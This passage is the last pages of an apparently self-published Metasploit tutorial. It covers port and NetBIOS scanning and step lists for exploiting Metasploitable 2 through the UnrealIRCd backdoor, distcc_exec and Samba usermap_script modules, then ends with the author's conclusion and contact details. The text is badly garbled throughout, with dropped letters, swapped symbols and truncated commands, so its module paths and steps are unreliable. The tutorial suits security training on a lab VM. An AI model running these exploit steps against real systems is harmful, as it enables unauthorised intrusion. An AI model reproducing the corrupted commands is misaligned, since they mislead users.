#ort scanners are used to see hich ports are open on the target sstem.7o i am
using a tcp port scanner to open ports on m indos p sstem.
%sage0use auiliarscannersportscantcp
Tpe sho options to ie aailable options
'et remote ip address set ;
-
8/20/2019 Met as Ploit Guide
85/92
'canning for netbios0
1.'et remote hostsset ;
-
8/20/2019 Met as Ploit Guide
86/92
'etting rhostset ;
-
8/20/2019 Met as Ploit Guide
87/92
Chapter Tele
/inu eploitation
'o far:ou hae seen indos eploitation .7o i ill sho ou ho to
eploit linu operating sstem.In this chapter e ill use metasploitable 2
hich is intentionall ulnerable ubuntu linu based operating sstem.This operatingsstem as deeloped b metasploit deelopers for securit professionals to practise
their tools on this operating sstem.
It has ulnerable eb applications mutillidae and =6@-+=amn ulnerable
eb application, the contain all the ulnerabilities of 8@-'# top 1) and man
more.Dou can donload metasploitable 2 from the belo lin*.
https0sourceforge.netpro9ectsmetasploitablefilesMetasploitable2
-fter donloading from the aboe lin* ou can install it in our 6mare.-fter
sstem boots up ou can login in our metasploitable 2 using username msfadmin and
passord msfadmin.
?irst:e hae to *no the ip address:.Rust tpe ifconfig to *no the ip
address.Then go to our bac*trac* machine : use nmap tool to scan open ports and
serices to *no hich serices are running in the metasploitable 2 machine.
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
-
8/20/2019 Met as Ploit Guide
88/92
'canning ith nmap0 @e hae to use nmap to scan open ports and serices running.
%sage 0 nmap sT 1(2.1"&.21$.13"+Metasploitable ip address,.
Dou can see man serices running.7o i ill choose an eploit %nrealI;C= I;C
daemon.This ersion has bac*door and it is running on """$ port.
7o search for this eploit
%sage 0 search unrealircd
Dou can see onl one eploit is aailable and ou can see that the ran* is ecellent.
-
8/20/2019 Met as Ploit Guide
89/92
'tep 10 use eploituniircunreal5ircd532&15bac*door
Tpe sho options to ie aailabe options
'tep 20 set ;
-
8/20/2019 Met as Ploit Guide
90/92
Eploit 20
distcc5eec0This program ma*es it eas to scale large compiler 9obs.Dou can *no more
about this eploit in the belo lin*.
http0metasploit.commoduleseploitunimiscdistcc5eec'tep 10 use eploitunimiscdistcc5eec
'tep 20 Tpe eploit
http://metasploit.com/modules/exploit/unix/misc/distcc_exechttp://metasploit.com/modules/exploit/unix/misc/distcc_exec
-
8/20/2019 Met as Ploit Guide
91/92
Eploit 30
usermap5script0 This is a command eecution ulnerabilit in samba ersion 3.).2).Dou
can read more about in belo lin*.
http0.metasploit.commoduleseploitmultisambausermap5script
'tep 10 use eploitmultisambausermap5script
'tep 20 set ;
-
8/20/2019 Met as Ploit Guide
92/92
Conclusion0
Thats all I hae on m mind for this document.I ould arml
elcome our feedbac* +either positie or negatie,.I need our suggestions
hich ould help me moe further.Than*ing ou er much for reading this
document.#ractise all the commands so as to gain confidence command oer
metasploit.#lease do not iolate an securit rules and do not do an maliciousactiit ith these techni>ues+I hope u reall ouldnt,.-ll techni>ues hich I
hae mentioned here ere eecuted on m laptop.If ou hae an
>ueries:concerns please feel free to contact me+belo gien are m contact
details,.?inall: I ould li*e to conclude ith an ecellent >uote0
There is no securit in life: onl opportunit. Mar* Tain
-bout me0 I : *aleem shai* : am or*ing as an -'E+-ssistant 'stems Engineer, in
TC'.M areas of interest are Ethical hac*ing : #enetration Testing and anthing
eerthing in relation ith 'EC%;ITD.
Contact =etails0
7ame 0 Kaleem 'hai*
Email 0 *aleemshai*$&"Jhotmail.com
Than*s ;egards
Kaleem 'hai*